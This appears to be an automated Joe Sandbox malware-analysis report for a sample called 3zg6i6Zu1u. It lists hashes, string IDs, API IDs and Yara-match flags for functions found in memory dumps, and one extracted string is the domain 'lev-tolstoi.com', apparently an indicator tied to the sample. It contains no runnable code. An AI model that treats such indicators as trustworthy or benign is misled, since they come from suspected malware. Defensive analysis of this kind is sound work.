• Opcode ID: 1a2b36ded3d63c48934e883b06f9b4d8cc45036b94076ba770b07ddeb3608e72
• Instruction ID: 22ccddc28fc708269306c978beef408f1ed5ca82190ea807a368fb49a74d3678
• Opcode Fuzzy Hash: 1a2b36ded3d63c48934e883b06f9b4d8cc45036b94076ba770b07ddeb3608e72
• Instruction Fuzzy Hash: 5BA1F17550C3928BD739CF268450BEBBBE2AFE2300F18896DD0D55B392D7790906CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: M99$M99${
• API String ID: 0-726366120
• Opcode ID: 8d7211f4c4637cd8ba74eb749a251204111377ab38b478c7b2f32186a7a574d9
• Instruction ID: f63e886754d2f8b0a4918178e697645c79cb63f24128d1e0e3a60bf90f675cf0
• Opcode Fuzzy Hash: 8d7211f4c4637cd8ba74eb749a251204111377ab38b478c7b2f32186a7a574d9
• Instruction Fuzzy Hash: 76E1F675208381CBD724CF28D8957EBBBE2EFD5304F18886DE4D987292D7389846CB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: LoWf$dUgS$y}zN
• API String ID: 0-3353942304
• Opcode ID: c56ece68d25b053fc45e7bbabff213bb9af3a884a6344b36a553f0283c3d2f6e
• Instruction ID: 9afdd42b56ae40ab4dd5e281407d5461c0fd8baedc768c94432ec64788af82fb
• Opcode Fuzzy Hash: c56ece68d25b053fc45e7bbabff213bb9af3a884a6344b36a553f0283c3d2f6e
• Instruction Fuzzy Hash: 60E13775609391CFD714CF28E8A071EBBE2FF8A314F45866DE4955B3A2C7349940CB4A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: R@$YZ$ABC
                                                                                                                                                                                                                                                          • API String ID: 0-1595031515
                                                                                                                                                                                                                                                          • Opcode ID: 3dfd9caee6b709295c13799ae250536b88b24724ec0ea3151b9be87810baffe9
                                                                                                                                                                                                                                                          • Instruction ID: 270e1ec567564e7ac11abac967337e8e2186c96c465a8b5db0c3d0d17cb18083
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dfd9caee6b709295c13799ae250536b88b24724ec0ea3151b9be87810baffe9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5A1DF76A083618FD324CF28D85175BB7E2FFC5300F05882DE4898B381E7789906CB96
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ^D$iM$tz
                                                                                                                                                                                                                                                          • API String ID: 0-1308588582
                                                                                                                                                                                                                                                          • Opcode ID: e13069b4e80495524c3989dd50d5f3b67c32311433174fed63dae222ed4aa9da
                                                                                                                                                                                                                                                          • Instruction ID: e56e7d02d3a5d33b8834308afa178411130289b18f56fe60d9f05005faf0ba04
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e13069b4e80495524c3989dd50d5f3b67c32311433174fed63dae222ed4aa9da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1812AB26083618BC724DF69C89165BBBF1EF85314F098A2DE8C54B750F3759805C7C2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ^D$iM$tz
                                                                                                                                                                                                                                                          • API String ID: 0-1308588582
                                                                                                                                                                                                                                                          • Opcode ID: d4fccb09ca02ca265e5a2ee1d5ec9f6955df610e162b9df98781e2be2e9d3637
                                                                                                                                                                                                                                                          • Instruction ID: 86ebe705a78406a5c1a3aac74b58c8bc8eea1bff25a69ee308d07cbdd2d3a250
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4fccb09ca02ca265e5a2ee1d5ec9f6955df610e162b9df98781e2be2e9d3637
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86813A72A083618BC324DF69D89125BB7F1EFD5318F098A2CE8C59B350E7799805CBC6
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: _q0s$gfff$o~A
                                                                                                                                                                                                                                                          • API String ID: 0-1380180136
                                                                                                                                                                                                                                                          • Opcode ID: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                                                                                                                                                                                          • Instruction ID: 9ac1f0c1fc7a49e8154fcc72e3c80d4cb5b55f6ce251fccbb0b8a1824a22e975
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E71B2726093508BC724DF25C8622EB77E2FFD5364F188A2DD8998B395E7388941C786
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                          • API String ID: 0-2784972518
                                                                                                                                                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                          • Instruction ID: 2ba03358afb4aa586080315134d9a6fa806d0697afe7ce4ec3d947c4ea805d1a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB3147B6911609DFDB10CF99C880AEEBBF9FF48324F15504AD851A7310D771EA45CBA4
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                                                          • Opcode ID: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                                                                                                                                                                                          • Instruction ID: 6b6bb63bf8fd97176c83fd8f48d4d9708842aa01a65373b32ff33e7f12d62bc2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F87259716093409FD714CF28C890BAFBBE2AF85314F44892EF9998B391D375D949CB92
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                                                          • Opcode ID: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                                                                                                                                                                                          • Instruction ID: b632590525e39ce5a857bdb2105f3f6bf93eafba229eb97f7c3f587b0413ca56
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B17245716083409FDB14CF18C884BABBBE1EF84314F04892EF9899B391D779D949CB96
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2610073882-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: Variant$ClearInit
• String ID:
• API String ID: 2610073882-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: ^_$lev-tolstoi.com
• API String ID: 0-1855683627
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: _$uHHs
• API String ID: 0-2879388440
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: _$uHHs
• API String ID: 0-2879388440
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: I^]J$x[EH
• API String ID: 0-931091327
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: InitializeThunk
• String ID: I^]J$x[EH
• API String ID: 2994545307-931091327
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: )$IEND
• API String ID: 0-707183367
                                                                                                                                                                                                                                                          • Opcode ID: 1b6de2c190c02fbea61387cb34139e6b47e564e05f79e2f2ac439f578bf2f602
                                                                                                                                                                                                                                                          • Instruction ID: 9e91746e592093abc6b78d22eaac013f7dd1cf175606ed20a1766aa15e76428f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6de2c190c02fbea61387cb34139e6b47e564e05f79e2f2ac439f578bf2f602
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03D1BFB1A083449FD710DF14D84575BBBE4ABD4308F14492EFA99AB3C2E379E904CB96
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: e>3@$i>3@
                                                                                                                                                                                                                                                          • API String ID: 0-675609054
                                                                                                                                                                                                                                                          • Opcode ID: 4b823d5a739544e07909f0db0eb8d2352278b010a9f16c06b625cc5fc70a34e4
                                                                                                                                                                                                                                                          • Instruction ID: 9b82f782cdf0538c1051068375ea51c287a2a5449ef268f96f4f9dc1f5ddf874
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b823d5a739544e07909f0db0eb8d2352278b010a9f16c06b625cc5fc70a34e4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9A12936A083119FC724DF18C8A092BB7E2FF98744F1A852DE9859B761D732EC55C781
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: e>3@$i>3@
                                                                                                                                                                                                                                                          • API String ID: 2994545307-675609054
                                                                                                                                                                                                                                                          • Opcode ID: 2c863d08b076efa2f98af33917119d36d08e2e82690e5b60920692513f3024ce
                                                                                                                                                                                                                                                          • Instruction ID: d63809bf3076d72f070bdb060dff65e02fc893e24afa0153ad856657245a98a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c863d08b076efa2f98af33917119d36d08e2e82690e5b60920692513f3024ce
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83A1F436A083119BC724DF18C88092BB7E2FF9C710F19947DE8869B365DB35AC55CB86
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: !LDw$D
                                                                                                                                                                                                                                                          • API String ID: 0-631248872
                                                                                                                                                                                                                                                          • Opcode ID: dc6169488d60e39e14afbbbe44962d8ec75923c6dd643a2a98093ad71e27ba6d
                                                                                                                                                                                                                                                          • Instruction ID: 7e09ab24442d4b71b88b13391f34237f2dfc9f095084ee9819a17599225fc662
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc6169488d60e39e14afbbbe44962d8ec75923c6dd643a2a98093ad71e27ba6d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCA1A1B0118340CFD724DF24C8A1BABBBF1FF96305F09595DE48A4B2A2E7798945CB46
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: bBB$rBB
                                                                                                                                                                                                                                                          • API String ID: 0-3277761424
                                                                                                                                                                                                                                                          • Opcode ID: bb51691f9dde2279535c869879990e0e1ffd92db3571b05c63e2572ef1324b61
                                                                                                                                                                                                                                                          • Instruction ID: be6856a020535e4a6e683abf22a1b7757c0c9bd1d2ca0ad35f5e609e3485cc7a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb51691f9dde2279535c869879990e0e1ffd92db3571b05c63e2572ef1324b61
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83713579A0C3409FD724CF18EC41BABB7E4EB86308F50493EF59997282D774A905CB96
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: _q0s$gfff
                                                                                                                                                                                                                                                          • API String ID: 0-1196501146
                                                                                                                                                                                                                                                          • Opcode ID: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                                                                                                                                                                                          • Instruction ID: b35f9c284684a1d2b3438c7372489de28762a9bfa06e0f2c03d8645e6f4d9608
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6171C2726196508BC738DF25C8527EF77A2FFD5324F188A2DD8998B794E7388501CB82
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: gy${
                                                                                                                                                                                                                                                          • API String ID: 0-2069607922
                                                                                                                                                                                                                                                          • Opcode ID: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
                                                                                                                                                                                                                                                          • Instruction ID: ed7d28f547c76ceeafa36ca8f2d54dfdddf3ab4be68e843ec7e75833a51ca910
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E831DFB02883948FD3508F519880B5FBFF1FBC6714F159A6CE6D1AB691C77590468B06
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: gy${
• API String ID: 0-2069607922
• Opcode ID: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
• Instruction ID: 431e554adce80ef47d4d1f40f80e38f5c8695c8e2ce9c58edc59fdf38191c638
• Opcode Fuzzy Hash: da2f2a0c6207235e0a990dccae0dbce93f9678055be0d1fcb7fe1bdd5a6a2c50
• Instruction Fuzzy Hash: 3331FFB02883948FD3508F119C80B6FBBF1FBC6714F149A6CE6D1AB291C77990468B0A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: InitializeThunk
• String ID: f
• API String ID: 2994545307-1993550816
• Opcode ID: 911a7e592e4c48b71ad536d3dbe37319113398f09b4a3efeb0ff10449ae76945
• Instruction ID: fe604cc3133df0d3ef17166e2c6d21145ffaf46a9ca28f7e45b4cb97c9031a62
• Opcode Fuzzy Hash: 911a7e592e4c48b71ad536d3dbe37319113398f09b4a3efeb0ff10449ae76945
• Instruction Fuzzy Hash: 632213756083418FD714CF19C880B2BB7E2EBC9318F199A6EE595873A1D734EC01CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: "C
• API String ID: 0-2206442469
• Opcode ID: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
• Instruction ID: cc3b19862de00450c502d71b80b37b6a0facead2af28862af59a70b515e96c0c
• Opcode Fuzzy Hash: 318cf19dad6bd902ed9746a2d1b6ba562f171c8a02b36b8081c52eebcdc19270
• Instruction Fuzzy Hash: EA22F479B18111CFCB08CF38E8906AAB7A2FF8A315F1985BDD54697395C7349852CB44
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: wY
• API String ID: 0-856691870
• Opcode ID: 64ec636affbfb3505e55f349c0f97b4a1282f766ef673f98fbdb976a5a7cc095
• Instruction ID: 2400616457e19e448041b88361ef1ce1cfcd4646f93bfc5c6be26526a3fe0eb5
• Opcode Fuzzy Hash: 64ec636affbfb3505e55f349c0f97b4a1282f766ef673f98fbdb976a5a7cc095
• Instruction Fuzzy Hash: 0BF155B55083009BD3149F24D8927BBB3A1FFD6314F19882DE8C597391E738D986C79A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: "C
• API String ID: 0-2206442469
• Opcode ID: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
• Instruction ID: 7582ed78cd08e368e7f7bf7a7ebd23f02f26f556a500b2e852d8dce14501ab51
• Opcode Fuzzy Hash: c745bed812c72e11a2f85d115635a27e4d80eed790739967119487ee27e1db50
• Instruction Fuzzy Hash: EE02F339B18211CFCB08CF38E8906AAB7B2FF8A315F1989BDD54697395C7349842CB44
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: no
• API String ID: 0-1739204639
• Opcode ID: 2d01defe0772388fe6ea4fe43fa2d79a1c430645c6eba214e35ed69ebf30f6bc
• Instruction ID: 98ceff42bfd2534dc1cac3b1d484b7cbff31ece01bcc915c749c6e1bd002b957
• Opcode Fuzzy Hash: 2d01defe0772388fe6ea4fe43fa2d79a1c430645c6eba214e35ed69ebf30f6bc
• Instruction Fuzzy Hash: D1F1F1766183628BC714DF24E8506ABB3F2FFC5740F85886EE8C197350E7389A45DB86
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: "C
• API String ID: 0-2206442469
• Opcode ID: da03289935d2a365dedf4cbe9730c3ecdc5a79b854c84855746c9a427666edbc
• Instruction ID: f391942a458117ab2eff221fcfc61aedbfa58ea332473f0907b71af19172290f
• Opcode Fuzzy Hash: da03289935d2a365dedf4cbe9730c3ecdc5a79b854c84855746c9a427666edbc
• Instruction Fuzzy Hash: 89E1E239B18211CFCB08CF29D8916AEB7B2FF8A315F1986BDD50697395C7349852CB84
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: pq
• API String ID: 0-1239689891
• Opcode ID: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
• Instruction ID: a5e717fb7688114d9fa1566d0cd21e71ba382dc586e8a5b509a86c1e8e738340
